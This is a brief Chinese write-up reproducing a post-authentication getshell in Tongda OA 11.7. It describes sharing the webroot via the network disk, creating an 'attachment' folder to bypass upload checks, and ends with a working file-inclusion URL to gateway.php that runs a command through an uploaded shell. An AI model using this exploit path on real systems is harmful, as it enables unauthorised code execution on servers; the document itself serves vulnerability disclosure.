通达oa 11.7 后台getshell

一、漏洞简介

需要后台管理权限

二、漏洞影响

通达oa 11.7

三、复现过程

找到网络硬盘,创建共享目录为webroot目录地址

3.png

进行权限设置

4.png

5.png

然后general在这里需要创建一个叫attachment的文件夹进行绕过

6.png

在attachment这个文件夹就可以上传png了

7.png

下面用通达万年不变的文件包含,格式为这个https://www.0-sec.org/ispirit/interface/gateway.php?json={%22url%22:%22general/attachment/shell.php.png%22}&cmd=echo%20hhhhhh;